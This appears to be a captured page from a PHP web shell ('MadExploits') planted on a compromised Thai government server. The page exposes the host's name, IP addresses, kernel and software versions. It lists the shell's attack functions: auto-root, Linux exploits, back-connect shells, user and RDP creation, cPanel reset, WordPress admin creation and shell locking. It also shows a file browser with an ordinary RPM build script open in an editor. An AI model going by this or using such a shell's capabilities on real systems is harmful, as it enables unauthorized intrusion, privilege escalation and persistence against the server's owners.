Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
rpm /
redhat /
[ HOME SHELL ]
Name
Size
Permission
Action
find-provides.d
[ DIR ]
drwxr-xr-x
brp-compress
1.42
KB
-rwxr-xr-x
brp-implant-ident-static
970
B
-rwxr-xr-x
brp-java-repack-jars
2.6
KB
-rwxr-xr-x
brp-python-hardlink
682
B
-rwxr-xr-x
brp-redhat
405
B
-rwxr-xr-x
brp-sparc64-linux
1.05
KB
-rwxr-xr-x
brp-strip
509
B
-rwxr-xr-x
brp-strip-comment-note
803
B
-rwxr-xr-x
brp-strip-shared
707
B
-rwxr-xr-x
brp-strip-static-archive
416
B
-rwxr-xr-x
config.guess
43.55
KB
-rwxr-xr-x
config.sub
31.96
KB
-rwxr-xr-x
dist.sh
1.92
KB
-rwxr-xr-x
find-provides
2.79
KB
-rwxr-xr-x
find-provides.ksyms
241
B
-rwxr-xr-x
find-provides.libtool
187
B
-rwxr-xr-x
find-provides.pkgconfig
603
B
-rwxr-xr-x
find-requires
4.05
KB
-rwxr-xr-x
find-requires.ksyms
4.44
KB
-rwxr-xr-x
find-requires.libtool
271
B
-rwxr-xr-x
find-requires.pkgconfig
257
B
-rwxr-xr-x
kmodtool
7.5
KB
-rwxr-xr-x
macros
8.66
KB
-rw-r--r--
perl.prov
4.73
KB
-rwxr-xr-x
perl.req
6.22
KB
-rwxr-xr-x
rpmrc
3.25
KB
-rw-r--r--
rpmsort
2.11
KB
-rwxr-xr-x
symset-table
903
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : brp-sparc64-linux
#!/bin/sh # If using normal root, avoid changing anything. if [ -z "$RPM_BUILD_ROOT" -o "$RPM_BUILD_ROOT" = "/" ]; then exit 0 fi files= LC_ALL= LANG= # Move 64bit ELF objects from /lib, /usr/lib, /usr/X11R6/lib to */lib64 # directories for f in `find $RPM_BUILD_ROOT{,/usr,/usr/X11R6}/lib -maxdepth 1 -type f -o -type l 2>/dev/null`; do ff=$f while [ -L $ff ]; do l=`ls -l $ff | awk '{ print $11 }'` case $l in /*) ff=$RPM_BUILD_ROOT$l ;; *) ff=`dirname $ff`/$l ;; esac done if file $ff 2>/dev/null | grep ': ELF 64-bit .SB' | grep -v ': ELF 64-bit .SB executable' > /dev/null; then files="$files $f" elif file $ff 2>/dev/null | grep 'ar archive' > /dev/null; then if objdump -h $ff 2>/dev/null | grep ':[ ]*file format elf64-sparc' > /dev/null; then files="$files $f" fi fi done for f in $files; do d=`dirname $f` n=`basename $f` if [ ! -d ${d}64 ]; then mkdir -p ${d}64; fi if [ -L $f ]; then l=`ls -l $f | awk '{ print $11 }' | sed 's_lib\(/[^/]*\)$_lib64\1_'` ln -sf $l ${d}64/$n rm -f $f else mv -f $f ${d}64/$n fi done
Close